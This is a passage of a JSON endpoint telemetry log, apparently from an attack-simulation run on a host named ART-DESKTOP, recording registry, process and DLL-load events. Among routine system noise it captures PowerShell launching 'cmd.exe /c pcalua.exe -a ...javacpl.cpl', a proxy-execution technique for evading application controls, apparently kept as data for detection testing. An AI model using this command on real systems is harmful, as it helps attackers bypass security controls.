"C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", - "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal\\Render", - "registry_value": "Render", - "timestamp": 131883574008610000, - "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883574008610000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883574008610000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883574008610000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883574008920000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883574008920000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883574008920000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 4, - "process_name": "System", - "process_path": "System", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000", - "registry_value": "S-1-5-21-2047549730-3016700585-885829632-1000", - "timestamp": 131883574008920000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" - }, - { - "event_type": "registry", - "pid": 4, - "process_name": "System", - "process_path": "System", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", - "registry_value": "pcalua.exe", - "timestamp": 131883574008920000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" - }, - { - "event_type": "registry", - "pid": 4, - "process_name": "System", - "process_path": "System", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\SequenceNumber", - "registry_value": "SequenceNumber", - "timestamp": 131883574008920000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000040570", - "registry_value": "W32:0000000000040570", - "timestamp": 131883574008920000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000040570", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000040570\\VirtualDesktop", - "registry_value": "VirtualDesktop", - "timestamp": 131883574008920000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883574013520000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000040570", - "registry_value": "W32:0000000000040570", - "timestamp": 131883574013640000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "process", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "subtype": "terminate", - "timestamp": 131883574013690000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "registry", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", - "registry_value": "pcalua.exe", - "timestamp": 131883574013690000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883574013690000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", - "registry_value": "cbjrefuryy.rkr", - "timestamp": 131883574013869984, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883574013869984, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883574013869984, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883574013869984, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883574013869984, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "process", - "pid": 7060, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883574013869984, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"pcalua.exe -a C:\\Windows\\system32\\javacpl.cpl\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 3920, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883574014000000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3920, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574013960000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3920, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574013960000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3920, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574013960000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3920, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574013960000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}" - }, - { - "event_type": "file", - "file_name": "PCALUA.EXE-5EB8CBC1.pf", - "file_path": "C:\\Windows\\Prefetch\\PCALUA.EXE-5EB8CBC1.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883574013960000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3920, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574014050000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}" - }, - { - "event_type": "registry", - "pid": 3920, - "process_name": "cmd.exe", - "process_path": "C:\\WINDOWS\\system32\\cmd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", - "registry_value": "pcalua.exe", - "timestamp": 131883574014050000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}" - }, - { - "command_line": "pcalua.exe -a C:\\Windows\\system32\\javacpl.cpl", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7392, - "ppid": 3920, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "subtype": "create", - "timestamp": 131883574014090000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}", - "unique_ppid": "{42FC7E13-CC19-5C05-0000-0010716D5701}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "pcalua.exe", - "image_path": "C:\\Windows\\System32\\pcalua.exe", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014050000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014050000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014050000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014050000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014050000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "shell32.dll", - "image_path": "C:\\Windows\\System32\\shell32.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "pcaui.dll", - "image_path": "C:\\Windows\\System32\\pcaui.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014230000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014230000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "apphelp.dll", - "image_path": "C:\\Windows\\System32\\apphelp.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014230000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "comctl32.dll", - "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.441_none_fb3e9b173068fb23\\comctl32.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014230000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "dui70.dll", - "image_path": "C:\\Windows\\System32\\dui70.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014230000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "wer.dll", - "image_path": "C:\\Windows\\System32\\wer.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014230000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014230000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "uxtheme.dll", - "image_path": "C:\\Windows\\System32\\uxtheme.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014320000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000040570", - "registry_value": "W32:0000000000040570", - "timestamp": 131883574014320000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000040570", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000040570\\VirtualDesktop", - "registry_value": "VirtualDesktop", - "timestamp": 131883574014320000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "image_load", - "image_name": "msctf.dll", - "image_path": "C:\\Windows\\System32\\msctf.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014320000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "dwmapi.dll", - "image_path": "C:\\Windows\\System32\\dwmapi.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014320000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": 